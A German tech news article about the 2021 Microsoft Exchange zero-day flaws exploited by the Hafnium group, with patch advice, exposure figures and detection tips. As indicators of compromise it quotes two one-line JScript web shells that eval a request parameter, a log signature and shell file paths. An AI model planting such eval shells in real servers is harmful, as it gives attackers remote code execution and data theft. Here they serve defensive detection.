>> TechnikNews sucht Talente! <<

Folgen:

Microsoft Exchange Server mit riesiger Sicherheitslücke: Dringend updaten!

Microsoft Exchange Server
Bild: Microsoft
(Beitragsbild: © 2021 Microsoft)

Vor einigen Tagen hat Microsoft ein dringendes Update für eine Microsoft Exchange Server Sicherheitslücke in Version 2013, 2016 und 2019 veröffentlicht. Die Sicherheitslücke nutzen Hacker bereits auf zahlreichen Servern aus. Admins von Unternehmen und Kunden sollten den populären Mailserver am besten sofort updaten, falls noch nicht geschehen.

Microsoft hat Sicherheitslücken geschlossen, die eine chinesische Hackergruppe namens “Hafnium” derzeit massiv ausnutzen soll. Der entsprechende Blogpost von Microsoft spricht von mehreren Zero-Day-Exploits. Konkret geht es um CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 und CVE-2021-27065, die man am Mittwoch gepatcht hat. Derzeit soll es sich laut Microsoft um “begrenzte gezielte Angriffe” handeln, die aber schnell durch automatische Bots ersetzt werden könnten. Deswegen sollten Admins nun dringend handeln.

Laut Volexity könnten diese Angriffe bereits seit 06. Januar 2021 laufen, aber seit Mittwoch nun richtig losgehen. Außerdem demonstriert man in einem Video, wie das Ausnutzen der Sicherheitslücke aussieht.

Microsoft Exchange Server Sicherheitslücke: Wer ist betroffen?

Betroffen sind Exchange 2013, Exchange 2016 und Exchange 2019, welche den aktuellen Patch nicht eingespielt haben. Diesen stellt das Unternehmen für alle drei Versionen zu den jeweils letzten zwei CUs (außer Exchange 2013) zur Verfügung. Für Exchange 2013 gibt es einen Patch für CU23, bei Exchange 2016 für CU18 und CU19 und bei Exchange 2019 für CU7 und CU8. Wir haben Euch die Downloadseiten bei den entsprechenden CUs verlinkt. Wichtige Hinweise zum Update gibt es hier.

Sollte für das eingesetzte Cumulative Update kein Patch verfügbar sein, ist man zum Updaten gezwungen. Die Patches rollt man auch über Windows Update aus, funktionieren vermutlich aber nur bei den erwähnten Versionen. Die eingesetzte CU-Version lässt sich übrigens wie hier beschrieben über die Exchange Management Shell prüfen.

Analysen von CERT.at zufolge, sollen alleine in Österreich über 4.000 Exchange-Server mit sehr hoher Wahrscheinlichkeit verwundbar sein. In Deutschland sollen es laut der Sicherheits-Suchmaschine Shodan über 57.000 sein. Weltweit spricht man von rund 266.000 betroffenen Servern. Auch das deutsche Bundesamt für Sicherheit in der Informationstechnik (BSI) warnt vor der Sicherheitslücke und gibt Alarmstufe “Rot”. Weiters empfiehlt das BSI “bei allen Systemen, die nicht sofort in der Nacht zu Mittwoch aktualisiert wurden, zu prüfen, ob es zu einerKompromittierung gekommen ist. Hierzu müssen Exchange-Systeme auf bekannte Webshells untersucht werden.”

Nutzer, die Office 365 (neu: Microsoft 365) nutzen, haben nichts zu befürchten. Microsoft kümmert sich dort bereits um alle notwendigen Updates und Sicherheitspatches.

Microsoft Exchange Server Sicherheitslücke: Wurde ich bereits angegriffen?

Das ist schwierig zu sagen und kommt auf den Server an. Microsoft listet allerdings im Blogpost einige Indikatoren dafür auf, welche auf einen Angriff schließen können. Auch die Sicherheitsexperten von Rapid7 bieten auf ihrer Webseite weitere technische Analysen zu den Angriffen. In den meisten Fällen findet man aber in den ECP-Logs von IIS einige POST-Requests zu “/ecp/y.js”, durchgeführt mit diversen Python-Scripten:

"/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1"

Ein solcher Aufruf muss aber nicht unbedingt darauf hinweisen, dass bereits Daten abgeflossen sind. Die Hacker platzieren bei ihren Angriffen Webshells auf dem Server, über welche Daten – auch nach Einspielen des Patchs! – abgesaugt werden können. Auf GitHub stellt Microsoft ein Script zur Verfügung, welches einige der Angriffsmethoden in den Logs analysiert und Aufschluss über einen möglichen Angriff gibt.

Zudem könnten laut BSI mögliche Shells unter

%PROGRAMFILES%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\

als RedirSuiteServerProxy.aspx oder unter

C:\inetpub\wwwroot\aspnet_client\

abgelegt worden sein. Mit diesem GitHub-Script eines Entwicklers kann man auf weitere Webshells im System prüfen. Diese Shells enthalten als ExternalUrl oftmals folgendes:

http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>

oder

http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["klk123456"],"unsafe");}</script>

Allen Admins, die das hier gerade lesen: Viel Glück beim Patchen, Ruhe bewahren & Backups nicht vergessen! Wer jetzt noch überlegt, ob er die Patches noch an diesem Wochenende einspielen sollte: klares ja.

Empfehlungen für Dich

David Wurm

Macht das TechnikNews-Ding gemeinsam mit einem tollen Team schon über einige Jahre lang. Werkelt im Hintergrund an der Server-Infrastruktur und ist auch für alles redaktionelle zuständig. Ist an der aktuellen Technik fasziniert und bloggt gerne über alles Digitale. Ist sonst in der Freizeit oftmals beim Webentwickeln, Fotografieren oder Radiomachen anzutreffen.

David hat bereits 772 Artikel geschrieben und 336 Kommentare verfasst.

Web | Twitter | Insta | Dell XPS 15 7590 | Google Pixel 5
Mail: david.wurm|at|techniknews.net | bitte NICHT für allgemeine Anfragen, Kooperationen! Hier lang: Kontakt
guest
Dein Name, der öffentlich angezeigt wird.
Wir werden Deine Mailadresse nicht veröffentlichen.
0 Comments
Inline Feedbacks
View all comments